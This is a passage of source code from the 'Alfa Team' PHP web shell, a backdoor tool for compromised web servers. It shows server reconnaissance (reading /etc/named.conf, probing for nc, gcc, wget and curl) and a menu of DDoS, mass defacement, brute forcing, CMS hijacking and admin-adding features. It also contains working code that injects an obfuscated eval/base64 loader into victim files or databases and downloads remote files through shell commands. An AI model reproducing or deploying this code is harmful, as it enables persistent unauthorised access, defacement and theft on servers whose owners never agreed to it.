		fid = editor_current_file;
	}
	if(editor_files[fid]){
		d.getElementsByClassName("editor-path")[0].innerHTML = (editor_files[fid].pwd + "/" + editor_files[fid].file).replace(/\/\//g, "/");
	}
}
function removeHistory(el){
	delete editor_files[el];
	if($(el)){
		$(el).parentNode.parentNode.removeChild($(el).parentNode);
	}
	var elm = d.getElementsByClassName("filestools")[0];
	if(elm){
		if(elm.getAttribute("fid") == el){
			elm.outerHTML = "";
		}
	}
	if(editor_current_file == el){
		editor_current_file = "";
	}
	updateCookieEditor();
}
function getRandom(e){
	for(var i = "undefined" == typeof e ? 20 : e, t = "", s = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ", n = i; n > 0; --n) t += s[Math.floor(Math.random() * s.length)];
	return t
}
function reopen(el){
	var file_id = el.getAttribute("id")
	var pwd = editor_files[file_id].pwd;
	var filename = editor_files[file_id].file;
	editor(filename, "auto", "", pwd, file_id);
}
function copyToClipboard(el){
	var node = document.getElementById(el);
	if(document.selection){
		var range = document.body.createTextRange();
		range.moveToElementText(document.getElementById(el));
		range.select();
		document.execCommand("Copy");
		alert("text copied");
	}else if (window.getSelection()){
		var range = document.createRange();
		range.selectNode(document.getElementById(el));
		window.getSelection().removeAllRanges();
		window.getSelection().addRange(range);
		document.execCommand("copy");
		alert("text copied");
	}
}
function encrypt(str, pwd) {
	if (pwd == null || pwd.length <= 0) {
		return null;
	}
	str = alfab64(str, true);
	pwd = alfab64(pwd, true);
	var enc_chr = "";
	var enc_str = "";
	var i = 0;
	while (i < str.length) {
		for (var j = 0; j < pwd.length; j++) {
			enc_chr = str.charCodeAt(i) ^ pwd.charCodeAt(j);
			enc_str += String.fromCharCode(enc_chr);
			i++;
			if (i >= str.length) break;
		}
	}
	return alfab64(enc_str, true);
}
function reloadSetting(e){
alfaloader("block");
_Ajax(d.URL,"a="+alfab64("settings")+"&alfa1="+alfab64(e.protect.value)+"&alfa2="+alfab64(e.lgpage.value)+"&alfa3="+alfab64(e.username.value)+"&alfa4="+alfab64(e.password.value)+"&alfa5="+alfab64(">>")+"&alfa6="+alfab64(e.icon.value)+"&alfa7="+alfab64(e.post_encrypt.value)+"&alfa8="+alfab64("main")+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),function(a){evalJS(a),alfaloader("none")},true);
if(e.e.value==0&&e.protect.value==1)setTimeout("location.reload()",1000);
if(e.s.value!=e.icon.value)setTimeout("location.reload()",1000);
return false
}
function reloadColors(config){
	var obj = {};
	if(typeof config == "undefined"){
		d.querySelectorAll(".colors_input").forEach(function(e){
			var id = e.getAttribute("target").replace(".", "");
			obj[id] = e.value;
		});
	}else{
		obj = config;
	}
	alfaloader("block");
	var checdk = ($("use_default_color").checked?"1":"0");
	_Ajax(d.URL,"a="+alfab64("settings")+"&alfa1="+alfab64(JSON.stringify(obj))+"&alfa2="+alfab64(">>")+"&alfa3="+alfab64(checdk)+"&alfa8="+alfab64("color")+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),function(e){alfaloader("none");evalJS(e);},true);
}
function alfab64(a, normal){
	if(typeof normal != "undefined" || post_encryption_mode == false){
		return window.btoa(unescape(encodeURIComponent(a)));
	}
	return encrypt(a, "'._AlfaSecretKey().'");
}
function evalCss(jcss){
	var style = document.createElement("style");
	if (style.styleSheet) {
		style.styleSheet.cssText = jcss;
	} else {
		style.appendChild(document.createTextNode(jcss));
	}
	d.getElementsByTagName("head")[0].appendChild(style);
}
function colorHandlerKey(el){
	setTimeout(function(e){
		colorHandler(el);
	}, 200);
}
function colorHandler(el){
	var target = el.getAttribute("target");
	var multi = el.getAttribute("multi");
	var ishover = target.indexOf(":hover");
	if(multi){
		var array = JSON.parse(atob(multi));
		var jcss = "";
		for(i in array.multi_selector){
			jcss += i + "{"+array.multi_selector[i].replace(/{color}/g, el.value)+"}";
		}
		evalCss(jcss);
	}
	if(ishover != -1 && !multi){
		$("input_" + target.replace(".","")).value = el.value;
		$("gui_" + target.replace(".","")).value = el.value;
		var css = target+"{color: "+el.value+";}";
		evalCss(css);
	}else{
		$("input_" + target.replace(".","")).value = el.value;
		$("gui_" + target.replace(".","")).value = el.value;
		if(target == ".header_values"){
			target = ".header,.header_values";
		}
		d.querySelectorAll(target).forEach(function(e){
			e.style.color = el.value;
		});
	}
}
function importConfig(event){
	var input = event.target;
    var reader = new FileReader();
    reader.onload = function(){
      var data = reader.result;
	  try{
		  var conf = JSON.parse(data);
		  reloadColors(conf);
	  }catch(e){
		  alert("Config is invalid...!");
	  }
	  $("importFileBtn").value = "";
    };
    reader.readAsText(input.files[0]);
}
function checkBox(){for(i=0;i<d.files.elements.length;i++){if(d.files.elements[i].type == "checkbox"){d.files.elements[i].checked = d.files.elements[0].checked;}}}
function path_history(pos){
	_Ajax(d.URL,"a="+alfab64("GetPathHistory")+"&ajax="+alfab64("true"),function(e){g("FilesMan", e);},true);
}
function runcgi(lang){
	if(cgi_is_minimized && cgi_lang == lang){
		showEditor("cgiloader");
		return false;
	}
	_Ajax(d.URL,"a="+alfab64("cgishell")+"&alfa1="+alfab64(lang)+"&ajax="+alfab64("true"),function(e){
		d.body.style.overflow = "hidden";
		$("cgiloader").style.display = "block";
		$("cgiframe").innerHTML = e;
		cgi_lang = lang;
		if(cgi_is_minimized){
			$("cgiloader-minimized").setAttribute("class", "minimized-hide");
			setTimeout(function(){
				$("cgiloader").removeAttribute("class");
				if(is_minimized){
					$("editor-minimized").style.top = "30%";
				}
			}, 1000);
		}
	});
}
';
echo "</script>
<form style='display:none;' id='dlForm' action='' target='_blank' method='post'>
<input type='hidden' name='a' value='dlfile'>
<input type='hidden' name='c' value=''>
<input type='hidden' name='file' value=''>
</form>
<input type='file' style='display:none;' id='importFileBtn' onchange='importConfig(event);'>
<img id='a_loader' src='".__showicon('loader')."'>";
$cmd_uname = alfaEx("uname -a",false,false);
$uname = function_exists('php_uname') ? substr(@php_uname(), 0, 120) : (strlen($cmd_uname)>0?$cmd_uname:'( php_uname ) Function Disabled !');
if($uname=="( php_uname ) Function Disabled !"){$GLOBALS["need_to_update_header"]="true";}
echo '
</head>
<body bgcolor="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<div id="up_bar"></div>
<div class="whole">
<form method="post" name="mf" style="display:none;">
<input type="hidden" name="a">
<input type="hidden" name="c" value="'.$GLOBALS['cwd'].'">';
for($s=1;$s<=10;$s++){
echo '<input type="hidden" name="alfa'.$s.'">';
}
echo '<input type="hidden" name="charset">
</form>
<div id=\'hidden_sh\'><a class="alert_green" target="_blank" href="?solevisible">Hidden Shell<br><small>Version: <span class="hidden_shell_version">'.__ALFA_VERSION__.'</span></small></a></div>
<div class="header"><table width="100%" border="0">
<tr>
<td width="3%"><span class="header_vars">Uname:</span></td>
<td colspan="2"><span class="header_values" id="header_uname">'.$uname.'</span></td>
</tr>
<tr>
<td><span class="header_vars">User:</span></td>
<td><span class="header_values" id="header_userid">'. $uid . ' [ ' . $user . ' ] </span><span class="header_vars"> Group: </span><span class="header_values" id="header_groupid">' . $gid . ' [ ' . $group . ' ]</span> </td>
<td width="12%" rowspan="8"><img style="border-radius:100px;" width="300" height="170" alt="" src="http://solevisible.com/images/alfa-iran.png" /></td>
</tr>
<tr>
<td><span class="header_vars">PHP:</span></td>
<td><b>'.@phpversion(). ' </b><span class="header_vars"> Safe Mode: '.$safe_modes.'</span></td>
</tr>
<tr>
<td><span class="header_vars">ServerIP:</span></td>
<td><b>'.(!@$_SERVER["SERVER_ADDR"]?(function_exists("gethostbyname")?@gethostbyname($_SERVER['SERVER_NAME']):'????'):@$_SERVER["SERVER_ADDR"]).' <span class="header_vars">Your IP:</span><b> '.@$_SERVER["REMOTE_ADDR"].'</b></td>
</tr>
<tr>
<td width="3%"><span class="header_vars">DateTime:</span></td>
<td colspan="2"><b>'.date('Y-m-d H:i:s').'</b></td>
</tr>
<tr>
<td><span class="header_vars">Domains:</span></td>
<td width="76%"><span class="header_values" id="header_domains">';
if($GLOBALS['sys']=='unix'){
$d0mains = _alfa_file("/etc/named.conf",false);
if(!$d0mains){echo "Cant Read [ /etc/named.conf ]";$GLOBALS["need_to_update_header"]="true";}else{
$count=0;
foreach($d0mains as $d0main){
if(@strstr($d0main,"zone")){
preg_match_all('#zone "(.*)"#', $d0main, $domains);
flush();
if(strlen(trim($domains[1][0])) > 2){
flush();
$count++;}}}
echo "$count Domains";}}
else{echo("Cant Read [ /etc/named.conf ]");}
echo '</span></td>
</tr>
<tr>
<td height="16"><span class="header_vars">HDD:</span></td>
<td><span class="header_vars">Total:</span><b>'.alfaSize($totalSpace).' </b><span class="header_vars">Free:</span><b>' . alfaSize($freeSpace) . ' ['. (int) ($freeSpace/$totalSpace*100) . '%]</b></td>
</tr>';
if($GLOBALS['sys']=='unix'){
$useful_downloader = '<tr><td height="18" colspan="2"><span class="header_vars">useful:</span><span class="header_values" id="header_useful">--------------</span></td></tr><td height="0" colspan="2"><span class="header_vars">Downloader: </span><span class="header_values" id="header_downloader">--------------</span></td></tr>';
if(!@ini_get('safe_mode')){
if(strlen(alfaEx("id",false,false))>0){
echo '<tr><td height="18" colspan="2"><span class="header_vars">Useful : </span>';
$userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzialfa2','nc','locate','suidperl');
$x=0;
foreach($userful as $item)if(alfaWhich($item)){$x++;echo '<span class="header_values" style="margin-left: 4px;">'.$item.'</span>';}
if($x==0){echo "<span class='header_values' id='header_useful'>--------------</span>";$GLOBALS["need_to_update_header"] = "true";}
echo '</td>
</tr>
<tr>
<td height="0" colspan="2"><span class="header_vars">Downloader: </span>';
$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
$x=0;
foreach($downloaders as $item2)if(alfaWhich($item2)){$x++;echo '<span class="header_values" style="margin-left: 4px;">'.$item2.'</span>';}
if($x==0){echo "<span class='header_values' id='header_downloader'>--------------</span>";$GLOBALS["need_to_update_header"] = "true";}
echo '</td>
</tr>';
}else{
echo $useful_downloader;$GLOBALS["need_to_update_header"] = "true";
}
}else{
echo $useful_downloader;$GLOBALS["need_to_update_header"] = "true";
}
}else{
echo '<tr><td height="18" colspan="2"><span class="header_vars">Windows:</span><b>';
echo alfaEx('ver',false,false);
echo '</td>
</tr> <tr>
<td height="0" colspan="2"><span class="header_vars">Downloader: </span><b>-------------</b></td>
</tr></b>';
}
$quotes = (function_exists('get_magic_quotes_gpc')?get_magic_quotes_gpc():'0');if ($quotes == "1" or $quotes == "on"){$magic = '<b><span class="header_on">ON</span>';}else{$magic = '<span class="header_off">OFF</span>';}
echo '<tr>
<td height="16" colspan="2"><span class="header_vars">Disable Functions: </span><b>'.Alfa_GetDisable_Function().'</b></td>
</tr>
<tr>
<td height="16" colspan="2"><span class="header_vars">CURL :</span>'.$curl.' | <span class="header_vars">SSH2 : </span>'.$ssh2.' | <span class="header_vars">Magic Quotes : </span>'.$magic.' | <span class="header_vars"> MySQL :</span>'.$mysql.' | <span class="header_vars">MSSQL :</span>'.$mssql.' | <span class="header_vars"> PostgreSQL :</span>'.$pg.' | <span class="header_vars"> Oracle :</span>'.$or.' '.($GLOBALS['sys']=="unix"?'| <span class="header_vars"> CGI :</span> '.$cgi_shell:"").'</td><td width="15%"><center><a href="http://zone-h.org/archive/notifier=ALFA%20TEaM%202012" target="_blank"><span><font class="solevisible-text" color="#0F0">Sole Sad & Invisible</font></span></a></center></td>
</tr>
<tr>
<td height="11" colspan="3"><span class="header_vars">Open_basedir :</span><b>'.$open_b.'</b> | <span class="header_vars">Safe_mode_exec_dir :</span><b>'.$safe_exe.'</b> | <span class="header_vars"> Safe_mode_include_dir :</span></b>'.$safe_include.'</b></td>
</tr>
<tr>
<td height="11"><span class="header_vars">SoftWare: </span></td>
<td colspan="2"><b>'.@getenv('SERVER_SOFTWARE').'</b></td>
</tr>';
if($GLOBALS['sys']=="win"){
echo '<tr>
<td height="12"><span class="header_vars">DRIVE:</span></td>
<td colspan="2"><b>'.$drives.'</b></td>
</tr>';
}
echo '<tr>
<td height="12"><span class="header_vars">PWD:</span></td>
<td colspan="2"><span id="header_cwd">'.$cwd_links.' </span><a href="javascript:void(0);" onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')"><span class="home_shell">[ Home Shell ]</span> </a><a href="javascript:void(0);" onclick="path_history(\'back\');"><span class="back_shell">[ BACK ]</span></a></td>
</tr>
</table>
</div>
<div id="meunlist">
<ul>
';
$li = array('FilesMan'=>'Home','proc'=>'Process','phpeval'=>'Eval','sql'=>'SQL Manager','dumper'=>'Mysql Dumper','hash'=>'En-Decoder','connect'=>'BC','ssh2'=>'SSH2',
'zoneh'=>'ZONE-H','dos'=>'DDOS','safe'=>'ByPasser','cgishell'=>'Cgi Shell','ssiShell'=>'SSI SHELL','cpcrack'=>'Hash Tools',
'portscanner'=>'Port Scaner','basedir'=>'Open BaseDir','mail'=>'Fake Mail','ziper'=>'Compressor','IndexChanger'=>'Index Changer','pwchanger'=>'Add New Admin','ShellInjectors'=>'Shell Injectors',
'php2xml'=>'PHP2XML','cloudflare'=>'CloudFlare','Whmcs'=>'Whmcs DeCoder','symlink'=>'Symlink','MassDefacer'=>'Mass Defacer','Crackers'=>'BruteForcer','searcher'=>'Searcher',
'cmshijacker'=>'CMS Hijacker','remotedl'=>'Remote Upload','inbackdoor'=>'Install BackDoor','whois'=>'Whois','settings'=>'Alfa Settings','plus'=>'<span class="alfa_plus">Alfa +</font>','selfrm'=>'Remove Shell'
);
foreach($li as $key=>$value){
echo('<li><a href="javascript:void(0);" class="menu_options" onclick="g(\''.$key.'\',null,\'\',\'\',\'\');">'.$value.'</a></li>'."\n");
}
if(!empty($_SESSION['AlfaUser']) && !empty($_SESSION['AlfaPass']))
echo '<li><a href="javascript:void(0);" onclick="g(\'logout\',null,\'\',\'\',\'\');setTimeout(function(){location.reload();},2000);"><font color="red">LogOut</font></a></li></ul></div>';
else
echo '</ul></div>';}else{
@error_reporting(E_ALL ^ E_NOTICE);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@ini_set('magic_quotes_runtime', 0);
@set_time_limit(0);
}}
function alfalogout(){
unset($_SESSION['AlfaUser'],$_SESSION['AlfaPass']);
echo("<center><font color='red'>Logout...</font></center>");
}
function showAnimation($name){
	return '-webkit-animation: '.$name.' 800ms ease-in-out forwards;-moz-animation: '.$name.' 800ms ease-in-out forwards;-ms-animation: '.$name.' 800ms ease-in-out forwards;animation: '.$name.' 800ms ease-in-out forwards;';
}
function __showicon($r){
	$s['btn']='http://solevisible.com/images/btn.png';
	$s['alfamini']='http://solevisible.com/images/alfamini.png';
	$s['loader']='http://solevisible.com/images/loader.png';
	//return 'data:image/png;base64,'.__get_resource($s[$r]);
	return $s[$r];
}
function alfainbackdoor(){
alfahead();
echo '<div class=header><center><p><div class="txtfont_header">| Install BackDoor |</div></p><h3><a href=javascript:void(0) onclick="g(\'inbackdoor\',null,\'file\')">| In File | </a><a href=javascript:void(0) onclick="g(\'inbackdoor\',null,\'db\')">| In DataBase | </a></h3></center>';
$error = '<font color="red">Error In Inject BackDoor...!<br>File Loader is not Writable Or Not Exists...!</font>';
$success= '<font color="green">Success...!';
$textarea = "<div style='display:none;' id='backdoor_textarea'><div class='txtfont'>Your Shell:</div><p><textarea name='shell' rows='19' cols='103'><?php\n\techo('Alfa Team is Here...!');\n?></textarea></p></div>";
$select = "<div class='txtfont'>Use:</div> <select name='method' style='width:155px;' onChange='inBackdoor(this);'><option value='alfa'>Alfa Team Uploader</option><option value='my'>My Private Shell</option></select>";
$cwd = 'Example: /home/alfa/public_html/index.php';
if($_POST['alfa1']=='file'){
echo("<center><p><div class='txtfont_header'>| In File |</div></p><p><form onsubmit=\"g('inbackdoor',null,'file',this.method.value,this.file.value,this.shell.value,this.key.value);return false;\">{$select} <div class='txtfont'>Backdoor Loader:</div> <input type='text' name='file' size='50' placeholder='{$cwd}'> <div class='txtfont'>Key: </div> <input type='text' name='key' size='10' value='alfa'> <input type='submit' value=' '>{$textarea}</form></p></center>");
if($_POST['alfa2']!=''&&$_POST['alfa3']!=''&&$_POST['alfa4']!=''){
$method = $_POST['alfa2'];
$file = $_POST['alfa3'];
$shell = $_POST['alfa4'];
$key = str_replace(array('"','\''),'',trim($_POST['alfa5']));
if($key=='')$key='alfa';
if($method=='my'){$shell=__ZW5jb2Rlcg($shell);}else{$shell=$GLOBALS['__ALFA_SHELL_CODE'];}
$code = '<?php if(isset($_GET["alfa"])&&$_GET["alfa"]=="'.$key.'"){$func="cr"."ea"."te_"."fun"."ction";$x=$func("\$c","e"."v"."al"."(\'?>\'.base"."64"."_dec"."ode(\$c));");$x("'.$shell.'");exit;}?>';
if(@is_file($file)&&@is_writable($file)){@file_put_contents($file,$code."\n".@file_get_contents($file));__alert($success."<br>Run With: ".basename($file)."?alfa=".$key.'</font>');}else{__alert($error);}}}
if($_POST['alfa1']=='db'){
echo("<center><p><div class='txtfont_header'>| In DataBase |</div></p>".getConfigHtml('all')."<p><form onsubmit=\"g('inbackdoor',null,'db',this.db_host.value,this.db_username.value,this.db_password.value,this.db_name.value,this.file.value,this.method.value,this.shell.value,this.key.value);return false;\">");
$table = array('td1' =>
array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
'td2' =>
array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
'td3' =>
array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),
'td4' =>
array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
'td5' =>
array('color' => 'FFFFFF', 'tdName' => 'Backdoor Loader: ', 'inputName' => 'file', 'inputValue' => $cwd, 'inputSize' => '50', 'placeholder' => true),
'td6' =>
array('color' => 'FFFFFF', 'tdName' => 'Key: ', 'inputName' => 'key', 'inputValue' => 'alfa', 'inputSize' => '50')
);
create_table($table);
echo("<p>{$select}</p>");
echo($textarea);
echo("<p><input type='submit' value=' '></p></form></p></center>");
if($_POST['alfa2']!=''&&$_POST['alfa3']!=''&&$_POST['alfa5']!=''&&$_POST['alfa6']!=''){
$dbhost = $_POST['alfa2'];
$dbuser = $_POST['alfa3'];
$dbpw = $_POST['alfa4'];
$dbname = $_POST['alfa5'];
$file = $_POST['alfa6'];
$method = $_POST['alfa7'];
$shell = $_POST['alfa8'];
$key = str_replace(array('"','\''),'',trim($_POST['alfa9']));
if($key=='')$key='alfa';
if($method=='my'){$shell=__ZW5jb2Rlcg($shell);}else{$shell=$GLOBALS['__ALFA_SHELL_CODE'];}
if($conn = mysqli_connect($dbhost,$dbuser,$dbpw,$dbname)){
$code = '<?php if(isset($_GET["alfa"])&&$_GET["alfa"]=="'.$key.'"){$conn=mysqli_connect("'.str_replace('"','\"',$dbhost).'","'.str_replace('"','\"',$dbuser).'","'.str_replace('"','\"',$dbpw).'","'.str_replace('"','\"',$dbname).'");$q=mysqli_query($conn,"SELECT `code` FROM alfa_bc LIMIT 0,1");$r=mysqli_fetch_assoc($q);$func="cr"."ea"."te_"."fun"."ction";$x=$func("\$c","e"."v"."al"."(\'?>\'.base"."64"."_dec"."ode(\$c));");$x($r["code"]);exit;}?>';
if(@is_file($file)&&@is_writable($file)){
@mysqli_query($conn,'DROP TABLE `alfa_bc`');
@mysqli_query($conn,'CREATE TABLE `alfa_bc` (code LONGTEXT)');
@mysqli_query($conn,'INSERT INTO `alfa_bc` VALUES("'.$shell.'")');
@file_put_contents($file,$code."\n".@file_get_contents($file));
__alert($success."<br>Run With: ".basename($file)."?alfa=".$key.'</font>');}else{__alert($error);}}}}
echo('</div>');
alfafooter();
}
function alfawhois(){
echo("<div class='header'><center><p><div class='txtfont_header'>| Whois |</div></p><p><form onsubmit=\"g('whois',null,this.url.value,'>>');return false;\"><div class='txtfont'>Url: </div> <input type='text' name='url' style='text-align:center;' size='50' placeholder='google.com'> <input type='submit' value=' '></form></p></center>");
if($_POST['alfa2']=='>>'&&!empty($_POST['alfa1'])){
$site = str_replace(array('http://','https://','www.','ftp://'),'',$_POST['alfa1']);
$target = 'http://api.whoapi.com/?apikey=093b6cb9e6ea724e101928647df3e009&r=whois&domain='.$site;
$data = @file_get_contents($target);
if($data==''){$get = new AlfaCURL();$get->ssl = true;$data = $get->Send($target);}
$target = @json_decode($data,true);
echo __pre();
if(is_array($target)){echo($target["whois_raw"]);}else{echo alfaEx("whois ".$site);}}
echo("</div>");
}
function alfaremotedl(){
alfahead();
echo("<div class='header'><center><p><div class='txtfont_header'>| Upload From Url |</div></p><p>
<form onsubmit=\"g('remotedl',null,this.d.value,this.p.value,'>>');return false;\">
<p><div class='txtfont'>Url: </div>&nbsp;&nbsp;&nbsp;<input type='text' name='d' size='50'></p>
<div class='txtfont'>Path:</div> <input type='text' name='p' size='50' value='".$GLOBALS['cwd']."'><p><input type='submit' value=' '></p>
</form></p></center>");
if(isset($_POST['alfa1'],$_POST['alfa2'],$_POST['alfa3'])&&!empty($_POST['alfa1'])&&$_POST['alfa3']=='>>'){
echo __pre();
$url = $_POST['alfa1'];
$path = $_POST['alfa2'];
echo('<center>');
if(__download($url,$path)){
echo('<font color="green">Success...!</font>');
}else{
echo('<font color="red">Error...!</font>');
}
echo('</center>');
}
echo("</div>");
alfafooter();
}
function __download($url,$path=false){
if(!preg_match("/[a-z]+:\/\/.+/",$url)) return false;
$saveas = basename(rawurldecode($url));
if($path){$saveas=$path.$saveas;}
if($content = __read_file($url)){
if(@is_file($saveas))@unlink($saveas);
if(__write_file($saveas, $content)){return true;}}
$buff = alfaEx("wget ".$url." -O ".$saveas);
if(@is_file($saveas)) return true;
$buff = alfaEx("curl ".$url." -o ".$saveas);
if(@is_file($saveas)) return true;
$buff = alfaEx("lwp-download ".$url." ".$saveas);
if(@is_file($saveas)) return true;
$buff = alfaEx("lynx -source ".$url." > ".$saveas);
if(@is_file($saveas)) return true;
$buff = alfaEx("GET ".$url." > ".$saveas);
if(@is_file($saveas)) return true;
$buff = alfaEx("links -source ".$url." > ".$saveas);
if(@is_file($saveas)) return true;
$buff = alfaEx("fetch -o ".$saveas." -p ".$url);
if(@is_file($saveas)) return true;
return false;
}
function clean_string($string){
  if(function_exists("iconv")){
	  $s = trim($string);
	  $s = iconv("UTF-8", "UTF-8//IGNORE", $s);
  }
  return $s;
}
function __read_file($file, $boom = true){
$content = false;
if($fh = @fopen($file, "rb")){
$content = "";
while(!feof($fh)){
$content .= $boom ? clean_string(fread($fh, 8192)) : fread($fh, 8192);
}
}
if(empty($content)||!$content){
	$content = alfaEx("cat '".addslashes($file)."'");
}
return $content;
}
function alfaSettings(){
alfahead();
AlfaNum(6,7,8,9,10);
echo '<div class=header><center><p><div class="txtfont_header">| Settings |</div></p><h3><a href=javascript:void(0) onclick="g(\'settings\',null,null,null,null,null,null,null,null,\'main\')">| Generall Setting | </a><a href=javascript:void(0) onclick="g(\'settings\',null,null,null,null,null,null,null,null,\'color\')">| Change Color | </a></h3></center>';
if($_POST["alfa8"] == "main"){
echo '<p><center><div class="txtfont_header">| Settings |</div></p><form onSubmit="reloadSetting(this);return false;" method=\'post\'>';
$lg_array = array('0'=>'No','1'=>'Yes');
$penc_array = array('false'=>'No','true'=>'Yes');
$protect_html = "";
$icon_html = "";
$postEnc_html = "";
$login_html = "";
foreach($lg_array as $key=>$val)$protect_html .= '<option value="'.$key.'" '.($GLOBALS['DB_NAME']['safemode']=='1'?'selected':'').'>'.$val.'</option>';
foreach($lg_array as $key=>$val)$icon_html .= '<option value="'.$key.'" '.($GLOBALS['DB_NAME']['show_icons']=='1'?'selected':'').'>'.$val.'</option>';
foreach($penc_array as $key=>$val)$postEnc_html .= '<option value="'.$key.'" '.(!empty($_POST['alfa7'])&&$_POST['alfa7']==$key?"selected":(__ALFA_POST_ENCRYPTION__&&empty($_POST['alfa7'])?'selected':'')).'>'.$val.'</option>';
$lg_array = array("gui"=>"GUI","500"=>"500 Internal Server Error","403"=>"403 Forbidden","404"=>"404 NotFound");
foreach($lg_array as $key=>$val)$login_html .= '<option value="'.$key.'" '.($GLOBALS['DB_NAME']['login_page']==$key?'selected':'').'>'.$val.'</option>';
echo '';
echo '<table border="1"><tbody><tr><td><div class="tbltxt" style="color:#FFFFFF">Protect:</div></td><td><select name="protect" style="width:100%;">'.$protect_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Post Encryption:</div></td><td><select name="post_encrypt" style="width:100%;">'.$postEnc_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Show Icons:</div></td><td><select name="icon" style="width:100%;">'.$icon_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">login Page:</div></td><td><select style="width:100%;" name="lgpage">'.$login_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">UserName:</div></td><td><input type="text" style="width:95%;" name="username" value="'.(empty($_POST['alfa3'])?$GLOBALS['DB_NAME']['user']:$_POST['alfa3']).'" placeholder="solevisible"></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Password:</div></td><td><input type="text" style="width:95%;" name="password" placeholder="*****"></td></tr></tbody></table><input type="hidden" name="e" value="'.$GLOBALS['DB_NAME']['safemode'].'"><input type="hidden" name="s" value="'.$GLOBALS['DB_NAME']['show_icons'].'"><p><input type="submit" name="btn" value=" "></p></form></center>';
if($_POST['alfa5']=='>>'){
echo __pre();
if(!empty($_POST['alfa3'])){
$protect = $_POST['alfa1'];
$lgpage = $_POST['alfa2'];
$username = $_POST['alfa3'];
$password = md5($_POST['alfa4']);
$icon = $_POST['alfa6'];
$post_encrypt = $_POST['alfa7'];
@chdir($GLOBALS['home_cwd']);
$basename = @basename($_SERVER['PHP_SELF']);
$data = @file_get_contents($basename);
$find_user = '/\'user\'(.*?),/i';
$find_pw = '/\'pass\'(.*?),/i';
$find_lg = '/\'login_page\'(.*?),/i';
$find_p = '/\'safemode\'(.*?),/i';
$icons = '/\'show_icons\'(.*?),/i';
$postEnc = '/\'post_encryption\'(.*?),/i';
if(!empty($username)&&preg_match($find_user,$data,$e)){
$new = '\'user\' => \''.$username.'\',';
$data = str_replace($e[0],$new,$data);
}
if(!empty($_POST['alfa4'])&&preg_match($find_pw,$data,$e)){
$new = '\'pass\' => \''.$password.'\',';
$data = str_replace($e[0],$new,$data);
}
if(!empty($lgpage)&&preg_match($find_lg,$data,$e)){
$new = '\'login_page\' => \''.$lgpage.'\',';
$data = str_replace($e[0],$new,$data);
}
if(!empty($find_p)&&preg_match($find_p,$data,$e)){
$new = '\'safemode\' => \''.$protect.'\',';
$data = str_replace($e[0],$new,$data);
}
if(preg_match($icons,$data,$e)){
$new = '\'show_icons\' => \''.$icon.'\',';
$data = str_replace($e[0],$new,$data);
}
if(preg_match($postEnc,$data,$e)){
$new = '\'post_encryption\' => '.$post_encrypt.',';
$data = str_replace($e[0],$new,$data);
}
if(@file_put_contents($basename,$data)){
echo '<b>UserName: </b><font color="green"><b>'.$username.'</b></font><br /><b>Password: </b><font color="green"><b>'.$_POST['alfa4'].'</b></font><script>post_encryption_mode = '.$post_encrypt.';</script>';
}else{
__alert("<span style='color:red;'>File has no edit access...!</span>");
}
}else{
__alert("<span style='color:red;'>UserName is Empty !</span>");
}
}
}elseif($_POST["alfa8"] == "color"){
echo('<center><p><div class="txtfont_header">| Custom Color |</div></p><form onSubmit="reloadColors();return false;" method=\'post\'>');
echo '<table border="1"><tbody>';
$template = '<tr><td style="text-align:center;"><a href="http://solevisible.com/customcolors/{help}.png" target="_blank"><font color="#00FF00">Help</font></a></td><td style="text-align:center;"><div class="tbltxt">{index}</div></td><td><div class="tbltxt" style="margin-left:5px;">{target}:</div></td><td><input style="width:60px;" multi="{multi}" id="gui_{target}" onChange="colorHandler(this);" target=".{target}" type="color" value="{color}"></td><td><input type="text" style="text-align:center;" multi="{multi}" onkeyup="colorHandlerKey(this);" target=".{target}" id="input_{target}" class="colors_input" placeholder="#ffffff" value="{color}"></td></tr>';
$x = 1;
foreach($GLOBALS['__ALFA_COLOR__'] as $key => $value){
	$multi = "";
	if(is_array($value)){
		if(isset($value["multi_selector"])){
			$multi = __ZW5jb2Rlcg(json_encode($value));
		}
	}
	$value = alfa_getColor($key);
	$help = strtolower(str_replace(array(":", "+"), array("_", "_plus"), $key));
	echo str_replace(array("{index}", "{target}", "{color}", "{multi}", "{help}"), array($x++, $key, $value, $multi, $help), $template);
}
echo '<tr><td style="text-align:center;">-</td><td style="text-align:center;"><div class="tbltxt">*</div></td><td><div style="margin-left:5px;" class="tbltxt">Use Default Color:</div></td><td></td><td><center><input type="checkbox" id="use_default_color" value="1"></center></td></tr>';

echo '</tbody></table><p><input type="submit" name="btn" value=" "></p></form><p><button style="padding:4px;;margin-right:20px;" onclick="$(\'importFileBtn\').click();" class="button"> Import </button> <button style="padding:4px;margin-left:20px;" onclick="g(\'settings\',null,null,null,null,null,null,null,\'export\',\'color\')" class="button"> Export </button></center></p>';
if($_POST['alfa7']=='export'){
	echo __pre();
	$colors = is_array($GLOBALS["DB_NAME"]["color"])?$GLOBALS["DB_NAME"]["color"]:array();
	$glob_colors = $GLOBALS["__ALFA_COLOR__"];
	$array = array();
	foreach($glob_colors as $k => $v){
		if(isset($colors[$k])&&!empty($colors[$k])&&!$is_default){
			$v = trim($colors[$k]);
		}else{
